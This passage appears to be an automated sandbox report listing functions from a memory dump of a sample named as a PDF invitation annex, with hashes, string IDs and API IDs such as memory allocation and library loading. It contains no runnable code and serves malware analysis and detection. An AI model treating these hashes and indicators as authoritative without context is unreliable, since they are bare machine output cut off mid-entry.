                        • Instruction ID: c3a2b64d50f5cc895556fd22cfac4883b4725e8f781328ec0d6557d13f82fd09
                        • Opcode Fuzzy Hash: 589299283a7cc9953be6e7933401dcbb8dd08c2207b431bbaa466a0b95a8ef3b
                        • Instruction Fuzzy Hash: 72810232A4439ADFDF748E74CD64BEE37A5BF14340F86412ADD4AAB250E3304A44DB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9B44, Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8&8$xS
                        • API String ID: 0-3953144051
                        • Opcode ID: 611f9da7a244e8e9a06af276337cee06119e3f2c8cead976f2b6603834e449c7
                        • Instruction ID: a2fa20ee4fc9a2818a61269c70d1fb3e52c9d344fc6446ee40ac4b292225a851
                        • Opcode Fuzzy Hash: 611f9da7a244e8e9a06af276337cee06119e3f2c8cead976f2b6603834e449c7
                        • Instruction Fuzzy Hash: 4771F232A4439AEFDF748E64CD64BEE37A5BF14340F86412ADD49AB250E3304A44DB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADEF7, Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: e18db1677bd630009b9a1ebfd62dea45ae5632ff5b02b01f3e5624d2fe2b3469
                        • Instruction ID: 1dc29260d729e50e00109f46ea0b9d24d82edfb103f2611be3a448b208242fc0
                        • Opcode Fuzzy Hash: e18db1677bd630009b9a1ebfd62dea45ae5632ff5b02b01f3e5624d2fe2b3469
                        • Instruction Fuzzy Hash: 5561E831508388CBDF75DE78CCA47EA7FE1AF52350F9581AACC994E289D3344542CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADF8B, Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: ee52ec928186db4d450036a3ff970cb4a6c52c2651e67b056ed651137104297c
                        • Instruction ID: 4f9340c1a7c60a368dc8570be7ea2fad7f49bdaa29eb15f2afea34a96e8cd4eb
                        • Opcode Fuzzy Hash: ee52ec928186db4d450036a3ff970cb4a6c52c2651e67b056ed651137104297c
                        • Instruction Fuzzy Hash: 3751D571508398CBDF759E78CCA47DA7FE1EF52350F9581AACC9A4E289D3344542CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ADFC3, Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: a54b1fd2df8056cdac9873b79d97ea6eea589131ebef31001b0cc1261aaab60c
                        • Instruction ID: d7827661eb4668d28dffc39695cac96907009ccab2ae5e485708299fbe7f6790
                        • Opcode Fuzzy Hash: a54b1fd2df8056cdac9873b79d97ea6eea589131ebef31001b0cc1261aaab60c
                        • Instruction Fuzzy Hash: 6851F531408398CBDF759E78CCA87DA7FE1EF52350F9581AACC9A4E28AD3344142CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE033, Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: 90a2d1dc3bb3def297e48958cea9c99f9da8d417b9039fe4b2cbabcdfa2ef14c
                        • Instruction ID: 472576411f46dd66dfa934c99819cef28a20ddc04a84abd4c65c308dc4a45318
                        • Opcode Fuzzy Hash: 90a2d1dc3bb3def297e48958cea9c99f9da8d417b9039fe4b2cbabcdfa2ef14c
                        • Instruction Fuzzy Hash: 4351C372908388CADF759F74CCA87DABFF1EF51350F95816AC8994E289D3344542CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE08F, Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: eac9f2d0fd35f1e64dd4d2f490902bd815f856bc20906cc9b3473ac1c1db663b
                        • Instruction ID: 311ca39dd199f3565ce55b70d5712a6e889ecfc3ffa5cf2077cf5082eac78fac
                        • Opcode Fuzzy Hash: eac9f2d0fd35f1e64dd4d2f490902bd815f856bc20906cc9b3473ac1c1db663b
                        • Instruction Fuzzy Hash: 9D51D332508388CBDF75DF74C8A87DABBA1EF55350F95816AC89A4E299D3344642CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE062, Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: fd6e9c5184ec2c9b5e408e7de0c6f6d46bce61ebd1cb5d27a2d636cd25f1ef27
                        • Instruction ID: 9b2e588e796bded15a803ef3130e961efa452fb88372f0277d275eec913c1bd8
                        • Opcode Fuzzy Hash: fd6e9c5184ec2c9b5e408e7de0c6f6d46bce61ebd1cb5d27a2d636cd25f1ef27
                        • Instruction Fuzzy Hash: 7A51E332508388CBCF75DF74CCA87DEBBA1EF55350F95816AC89A4E299D3344642CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE177, Relevance: 2.6, Strings: 2, Instructions: 88COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FE4$`\oJ
                        • API String ID: 0-122960315
                        • Opcode ID: 1822fb71793429e3899a1c35c5418281dbfe12bad1a98d4a517ae203308eab4e
                        • Instruction ID: 6d03e7a1e6698e2e0689120acf8ae8f2d209a6ca16a1bfb279b149edbeb813d8
                        • Opcode Fuzzy Hash: 1822fb71793429e3899a1c35c5418281dbfe12bad1a98d4a517ae203308eab4e
                        • Instruction Fuzzy Hash: 7731AE71508398CBDF75DF74C8A47EA7BB1EF55350F95812ACC8A8E299E3344682CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9C83, Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8&8
                        • API String ID: 0-4158629819
                        • Opcode ID: 5bb8e8d07352e931325925faff2b9029b8d327979a0c7d3b6fea31c3615909cc
                        • Instruction ID: d87ac728e7b3b64eee6abaf0fcbe9b611c6b2cbc466df3278f21d4f6c794230d
                        • Opcode Fuzzy Hash: 5bb8e8d07352e931325925faff2b9029b8d327979a0c7d3b6fea31c3615909cc
                        • Instruction Fuzzy Hash: 6E510531A4439ADBDF748E64CD60BEE37B6FF14340F85052ADD49AB250D3309A40DB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9C0F, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8&8
                        • API String ID: 0-4158629819
                        • Opcode ID: 086792624d5322a5eddabea1c7ac2aecaed703a0e3d67db373b6b3162a9fb399
                        • Instruction ID: de373be06f0c911632710ef2b3a48b32c4b9ee54916b85fb7e0f5ab299122cb8
                        • Opcode Fuzzy Hash: 086792624d5322a5eddabea1c7ac2aecaed703a0e3d67db373b6b3162a9fb399
                        • Instruction Fuzzy Hash: 5A510532A5439ADBDF748E648D60BEF37A5BF14350F85412ADD4AAB250E3304A44EB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A6C4E, Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ]
                        • API String ID: 0-3352871620
                        • Opcode ID: 4f613ce6f36c232104d7ac34c84b89b27fc920e552b85f25135d0c1d7ac62a3e
                        • Instruction ID: 2a2c3ffc2ba091aaefe7bf1063e0e631ea521f94aa7191be7737ee766abdd7e9
                        • Opcode Fuzzy Hash: 4f613ce6f36c232104d7ac34c84b89b27fc920e552b85f25135d0c1d7ac62a3e
                        • Instruction Fuzzy Hash: 6851EC702003058FCB64DFB9C998B9AB7B5FF19390F964159D889CB221C375CA80CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7127, Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: g{
                        • API String ID: 0-2896474461
                        • Opcode ID: 7b7bbc219b7ceaee21e07b4ea4ed8eb77a41733a91f1b19f172557a93f147066
                        • Instruction ID: b0ba7d5f36c1af394c9fbc51a21d22a1ef02c3ff17e2067f3126a594e01854f6
                        • Opcode Fuzzy Hash: 7b7bbc219b7ceaee21e07b4ea4ed8eb77a41733a91f1b19f172557a93f147066
                        • Instruction Fuzzy Hash: F841D872905744DFDBB5CE6689B42DFB6E2AF89300FA5412F884F8BA24D330A946C711
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD05B, Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: fa4bf46380f97adb170e8f54f0c58bb7aab73617a16cf661775a7d5984f88cf0
                        • Instruction ID: e06e6ccfe396246fbd85098d396a175e1067fbef360e33e8ec4aff60cd0a97cf
                        • Opcode Fuzzy Hash: fa4bf46380f97adb170e8f54f0c58bb7aab73617a16cf661775a7d5984f88cf0
                        • Instruction Fuzzy Hash: 4A518872A04385DFCF348F69C9A43DF77A2BF95340F95411ACC895BA14D731AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD0BF, Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83b61fc5e05f55c39c146d4e21dcdf8b47c90f60332d3f064a453b8f48df875f
                        • Instruction ID: 31c5ce374315cbd5d7061cd6f622880e38482e9193fbce6cab4c60d22795bbf7
                        • Opcode Fuzzy Hash: 83b61fc5e05f55c39c146d4e21dcdf8b47c90f60332d3f064a453b8f48df875f
                        • Instruction Fuzzy Hash: B1517872A04385DFDB348F56C9A43DF77A2BF95340F85412ACC895B614D731AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD103, Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6fe80ee15eef0d3c35be8bcd48bc4b3c09fa8fb09467e9b59f050b544b6d83b1
                        • Instruction ID: a5aeabcf5180af970b8ef067e132c23e3b3c2e241971dae83fd1f1182ede55fd
                        • Opcode Fuzzy Hash: 6fe80ee15eef0d3c35be8bcd48bc4b3c09fa8fb09467e9b59f050b544b6d83b1
                        • Instruction Fuzzy Hash: 90516671A04385DFCB74CE5AC9A43EF77B2BF95340F81801ADC895B614D331AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD1DB, Relevance: .1, Instructions: 123COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8adec0b666f5d9c1e5810b9261038dcdbe83bcf70faea77425ce62f3d375b590
                        • Instruction ID: 44482d68c415cb58c5b8188eae2e04e1bf958708e8c11ac096f7b1be2b8089c6
                        • Opcode Fuzzy Hash: 8adec0b666f5d9c1e5810b9261038dcdbe83bcf70faea77425ce62f3d375b590
                        • Instruction Fuzzy Hash: 0F514571A04385DFDB74CE5AC9A43EF77B2BF95340F91811ADC895B614D330AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD26B, Relevance: .1, Instructions: 122COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6eb1b91b74af554639245176f2bca5c0e4ea9983007c99dd636c37339372d42d
                        • Instruction ID: 33cfddd49f236bd1e2f517aed3198746f12a04c7b07d95163b90741084ec299d
                        • Opcode Fuzzy Hash: 6eb1b91b74af554639245176f2bca5c0e4ea9983007c99dd636c37339372d42d
                        • Instruction Fuzzy Hash: C9514671A04385DFDB74CE5AC9A43EF77B2BF95340F91811ADC895B614D330AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD2E3, Relevance: .1, Instructions: 122COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96f92641b10229366c2a56a73bbf65222b9b993a5d8cf2b8a9122558cf94db25
                        • Instruction ID: 981c7b7483220fd408671211af78f4b4728ee61a5b14a85089a24889a8faa012
                        • Opcode Fuzzy Hash: 96f92641b10229366c2a56a73bbf65222b9b993a5d8cf2b8a9122558cf94db25
                        • Instruction Fuzzy Hash: 65514671A04385DFDB74CE5AC9A43EF77B2BF95340F91811ADC895B614D330AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD343, Relevance: .1, Instructions: 122COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83fa19b919b982813822abc58c1d7a5d0ffc4ec34841ce1a915e61ebca4799c0
                        • Instruction ID: 847c4713ba03786d43fed5a71e6d2af7d4315551b154afee38d48334de7c187f
                        • Opcode Fuzzy Hash: 83fa19b919b982813822abc58c1d7a5d0ffc4ec34841ce1a915e61ebca4799c0
                        • Instruction Fuzzy Hash: 82514871604345CFDB74CE5AC9A43EF77B2BF95340F91811ADC895B614D330AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD3F7, Relevance: .1, Instructions: 122COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d26ba60709fe99f0d1fba1159699ace42b4b96436c77f5b4a7ab77381eb4d512
                        • Instruction ID: b2ddd52bed7a6d55022f4b08f614017df3ad0293ea91e662b130704dbd5a57eb
                        • Opcode Fuzzy Hash: d26ba60709fe99f0d1fba1159699ace42b4b96436c77f5b4a7ab77381eb4d512
                        • Instruction Fuzzy Hash: CB514671A04385DFDB74CE5AC9A43EF77B2BF95340F91811ADC895B614D330AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD15F, Relevance: .1, Instructions: 122COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ed9293af8d7691cdd612ed81e5c6e71a12d77f315071fc7269d959077dbed226
                        • Instruction ID: db7bc77ea65d68042ad74de9092176ffa595daca6217965ff953b0992891fd36
                        • Opcode Fuzzy Hash: ed9293af8d7691cdd612ed81e5c6e71a12d77f315071fc7269d959077dbed226
                        • Instruction Fuzzy Hash: AC514671A04385DFDB74CE5AC9A43EF77B2BF95340F91811ADC895B614D330AA80CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9D07, Relevance: .1, Instructions: 118COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 89e97ed0e32649aaaeb32e799a58253498619f13108a7dc8bb2041bc4c0fbcf1
                        • Instruction ID: d4108ddc17383d75e1860e2a0da38720e771de0e7778ba5ea379b1f5d85bb55c
                        • Opcode Fuzzy Hash: 89e97ed0e32649aaaeb32e799a58253498619f13108a7dc8bb2041bc4c0fbcf1
                        • Instruction Fuzzy Hash: 0551D331A4439AEBDF74CE74CD61BEE37B6AF14340F85412ADD49AB250E3318A44EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9D74, Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50f0bba594334dee5b4dae7521ae9a0aaad44cdd5329dc5078c08e15ede3f7b7
                        • Instruction ID: cf49b268d35b2025fc7a1195b1d54a47c04ee0edbc24e0347b0bac1d620f7e2d
                        • Opcode Fuzzy Hash: 50f0bba594334dee5b4dae7521ae9a0aaad44cdd5329dc5078c08e15ede3f7b7
                        • Instruction Fuzzy Hash: C541D331A4439AEBEF74DE648D65BEE37B1BF14340F86001ACD4AAB250D3314A44EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A0AB8, Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID:
                        • API String ID: 2616484454-0
                        • Opcode ID: d4e94f1b80f4dcbe1678111e15cb0d4bc5b8a5f8a334b2fa7a87aff4be0e6b6b
                        • Instruction ID: a0e9189a3696208a189a546329554b5b8d5c0078e7efd2e6d666492448d2c1ff
                        • Opcode Fuzzy Hash: d4e94f1b80f4dcbe1678111e15cb0d4bc5b8a5f8a334b2fa7a87aff4be0e6b6b
                        • Instruction Fuzzy Hash: 933155B291434CCFC7149FB4D8962DA7BA2FF25340F61490EDD998B601D3308A6ADB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE431, Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ca86fd281159cbef89a990bc519462d86657bd0eaa938908794591997b641fa
                        • Instruction ID: 3a17c3402b77e5456130a4941e95f34c46ecdfad4bac3b139ca11e130ae67650
                        • Opcode Fuzzy Hash: 7ca86fd281159cbef89a990bc519462d86657bd0eaa938908794591997b641fa
                        • Instruction Fuzzy Hash: 2F41C6355083C68ADF71DE78D8E53EE7BA2AF51258F88456ACCC94A286C3714645CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A9DE7, Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6fb838dcd68bd27393ee79093714df2e15a36304c11a6ff351cc50a58f05b7d1
                        • Instruction ID: 53aea6eafa7a7daa4cb1a6e3fe4247ae733accbf4bcbadece19ecae4cfb79eca
                        • Opcode Fuzzy Hash: 6fb838dcd68bd27393ee79093714df2e15a36304c11a6ff351cc50a58f05b7d1
                        • Instruction Fuzzy Hash: DC41D231A4439AEBDF78CE64CD65BEE3772BF14380F85402ACD49AB550D3314A44EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE4A7, Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6095871242dc80d56e2c0f19c11ed028bdc4a4ec54dc0ec049abc40927eda639
                        • Instruction ID: 066a68d01ec2f714099155167afd038a2c223800ec40fc4f225a4a8e66b50206
                        • Opcode Fuzzy Hash: 6095871242dc80d56e2c0f19c11ed028bdc4a4ec54dc0ec049abc40927eda639
                        • Instruction Fuzzy Hash: F83129359083C6C6DF759E78DCA53EEBB62AF61258FC4456ECC854E28AC3750245CB22
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AC4EB, Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e89f6ff410af1fc96d5d635f7c4b12e5a618509e5966718043d004b2106cac0
                        • Instruction ID: 70ad792bf8deb519d30b3d8b29a7487034b5261965e37b8c23a3e9869f608be5
                        • Opcode Fuzzy Hash: 0e89f6ff410af1fc96d5d635f7c4b12e5a618509e5966718043d004b2106cac0
                        • Instruction Fuzzy Hash: F621A13520938A8BDB74CFB8C4A1BDF77A2BF5A704F86441ADC469B201D3718545D705
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7263, Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec1fc7c753f278fb61e84ea4def4504a51f2bfa3c4a0c3f3fe5426e23450c6b6
                        • Instruction ID: 1ef9eb3c6fe3c6d110a685ea29d831d160bfb406f51b750e573ca5020e60f212
                        • Opcode Fuzzy Hash: ec1fc7c753f278fb61e84ea4def4504a51f2bfa3c4a0c3f3fe5426e23450c6b6
                        • Instruction Fuzzy Hash: B421D472945304CFCBB98E6184B17EFB6E2AF99301F95451FC84F5BA60C3306846C615
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AE517, Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b99838e0ae22a27d607fcc9c4e32fab59cf29e3c630474216121db735afadff1
                        • Instruction ID: d3856328283797a0a94ba9a1e6a6d9c7bf28580d41e4b21c370260cc70ffe69d
                        • Opcode Fuzzy Hash: b99838e0ae22a27d607fcc9c4e32fab59cf29e3c630474216121db735afadff1
                        • Instruction Fuzzy Hash: 452129349083C6C6DF75DF78DCA93EEB762AF61358FC4856EC8864928AC3750285CB12
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A72A3, Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
